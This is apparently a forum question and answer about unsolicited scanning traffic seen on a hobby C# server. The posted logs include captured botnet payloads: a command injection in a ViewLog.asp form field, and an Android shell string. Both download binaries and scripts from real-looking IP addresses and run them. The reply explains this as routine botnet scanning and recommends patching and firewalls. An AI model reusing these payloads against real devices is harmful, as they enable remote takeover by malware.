# Intensive 586 (ms-shuttle) port scan/exploit/hacking attempts

Tags: http, exploit, ports, network-scanners, tcp

Recently i wanted to play a bit with TCP/UDP networking (and touch some custom HTTP server impl) on C# and found out that i'm getting requests from totally unknown dudes, such as this one:

```
   FROM: [::ffff:149.129.139.48]:52306
   [ANS]
POST /cgi-bin/ViewLog.asp HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: B4ckdoor-owned-you
Content-Length: 222
Content-Type: application/x-www-form-urlencoded

remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://107.174.133.119/bins/keksec.arm7;chmod+777+keksec.arm7;./keksec.arm7;rm+-rf+keksec.arm7%3b%23&remoteSubmit=Save
```

Then, i decided to go further and made a mass port-trap from 90 to 10000 and i found that the most intensive one is the 568 port which stands as ms-shuttle/smb port. Here's some samples:

```
[25.11.2020 21:53:46]
   FROM: [::ffff:181.188.133.9]:55852
   [ANS]
| UTF8:
 &�     Cookie: mstshash=hello
      
--------------------
[25.11.2020 21:53:33]
   FROM: [::ffff:185.176.222.39]:64787 // <= this dude was spamming me for like 2-4 hrs
   [ANS]
| UTF8:
 *�     Cookie: mstshash=Administr
      
--------------------
[25.11.2020 16:07:01]
   FROM: [::ffff:118.233.192.126]:48964
   [ANS]
| UTF8:
 X      �  �  ����shell:>/data/local/tmp/.x && cd /data/local/tmp; >/sdcard/0/Downloads/.x && cd /sdcard/0/Downloads; >/storage/emulated/0/Downloads && cd /storage/emulated/0/Downloads; rm -rf wget bwget bcurl curl; wget http://5.252.194.137/wget; sh wget; busybox wget http://5.252.194.137/bwget; sh bwget; busybox curl http://5.252.194.137/bcurl > bcurl; sh bcurl; curl http://5.252.194.137/curl > curl; sh curl
```

I tried to search some info about this port + knock-knocks on it, but didn't succeeded.
My log file size now exceeds 2 Mb so i wonder, why this is happening? Why this port is so actively being bombed? And, probably, what should i do to prevent receiving those requests?

Answer (score 0):

What you are seeing is mostly botnet traffic where infected routers or other devices are scanning all of the internet in an attempt to infect new devices or re-infect ones that have been cleaned up or hijacked by another crew. Sometimes this is done by exploiting specific vulnerabilities such as the `/cgi-bin/ViewLog.asp` one you posted, and others spread by brute forcing default credentials. This is totally normal and is just part of the internet white noise. It is also the reason why patching your software and automatic updates are important.

You can use a firewall to block incoming traffic to these ports if you're not using them, but if nothing is listening on the ports then it doesn't really have any impact unless its an exploit for the `TCP/IP` stack f.ex. that you are vulnerable to.